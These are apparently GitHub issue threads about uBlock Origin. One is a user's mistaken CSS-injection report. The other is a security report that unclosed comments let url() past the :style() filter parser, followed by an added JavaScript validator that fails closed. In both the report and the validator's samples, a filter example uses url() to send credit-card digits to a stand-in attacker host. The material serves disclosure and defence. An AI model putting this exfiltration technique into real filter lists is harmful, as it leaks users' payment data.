Closed taviso closed 3 years ago
I am using uBlock Origin in Firefox and experienced an HTML/CSS injection.
I checked my clipboard history to confirm that the injection must have happened inside the browser.
This is the full injected code. https://zerobin.net/?4ea4f656641e00a9#dvOszgwDNnt2qCQwyLH/x4hYfgpzsn2KUiqnI9hnTMs=
The injected CSS class is named .sharebtn.
The code was not running since it was just in the CSS tag, but the links are very shady.
Here are some snippets to make it indexable by search engines:
[href^=""], iframe[src^="https://isupportjournalism.com/"][style], CLOUDFLARE-APP[app-id="no-adblock"], div[style*="box-shadow: rgb(136, 136, 136) 0px 0px 12px; color: "], img[width="320"][height="50"], iframe[width="320"][height="50"], amp-auto-ads,
I am using Firefox. This is the list of active filters. My custom filters are not problematic.
Please fix this.
@joseftogo These are user CSS styles, that's how cosmetic filtering works. If you don't want cosmetic filtering, you can disable it.
Prerequisites
I tried to reproduce the issue when...
Description
If I understand the filter security model correctly, third party filter lists are trusted to hide content, but are not permitted to modify or read page content. For this reason, the CSS url() function is not permitted in any :style() rules, because that could be used to modify and/or exfiltrate content.
I guess the obvious way to exfiltrate content would be to auto-generate a ton of input.creditcard:has-text(/^0/):style(background-image: url(http://attacker/?matched=0) filters, but I guess you already realized this and that's why you ban url() 😃
Anyway, I think I've found a way to get a url() past the parser, it doesn't check if comments are closed in variables, so this filter:
Generates this CSS:
A specific URL where the issue occurs
https://www.example.com/
Steps to Reproduce
Visit this link, observe that there is an image background. I think this should be impossible.
Expected behavior
The CSS url() function is correctly banned.
Actual behavior
The parser is confused by unclosed comments.
uBlock Origin version
1.37.2
Browser name and version
Chrome 92
Operating System and version
Fedora 34
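A fail-closed check for the text inside :style(), added here as an example; it is not part of the issue thread and not uBlock Origin's code. It searches the raw text for url( and rejects unclosed comments or strings rather than trying to interpret them. The function name, the reason strings and the sample declarations are assumptions made for illustration.

```javascript
'use strict';

// Hypothetical helper (not uBlock Origin's code): decide whether the text
// inside :style(...) may be injected. Fails closed on anything ambiguous.
function checkStyleDeclarations(text) {
  // Match on the raw text, before any comment or string handling, so a
  // disagreement about where a comment ends cannot hide the token.
  if (/url\s*\(/i.test(text)) return { ok: false, reason: 'url()' };
  // Backslash escapes make raw-text matching unreliable; reject them.
  if (text.includes('\\')) return { ok: false, reason: 'escape' };

  let state = 'css'; // 'css', 'comment', or the quote char of an open string
  for (let i = 0; i < text.length; i++) {
    const two = text.slice(i, i + 2);
    if (state === 'css') {
      if (two === '/*') { state = 'comment'; i++; }
      else if (text[i] === '"' || text[i] === "'") state = text[i];
    } else if (state === 'comment') {
      if (two === '*/') { state = 'css'; i++; }
    } else if (two === '/*') {
      // A comment opener inside a string: parsers that do not track
      // strings would read the rest differently, so refuse it.
      return { ok: false, reason: 'comment opener in string' };
    } else if (text[i] === state) {
      state = 'css';
    }
  }
  if (state === 'comment') return { ok: false, reason: 'unclosed comment' };
  if (state !== 'css') return { ok: false, reason: 'unclosed string' };
  return { ok: true, reason: 'accepted' };
}

// Constructed sample declarations; the first is the one quoted in the issue.
const SAMPLES = [
  'background-image: url(http://attacker/?matched=0)',
  'color: red; /* reviewed */ opacity: 0.5',
  '--note: /* draft; color: red',
  '--label: "unterminated; color: red',
  'display: none !important',
];

function classifySamples() {
  return SAMPLES.map((s) => checkStyleDeclarations(s).reason);
}

console.log(classifySamples());
```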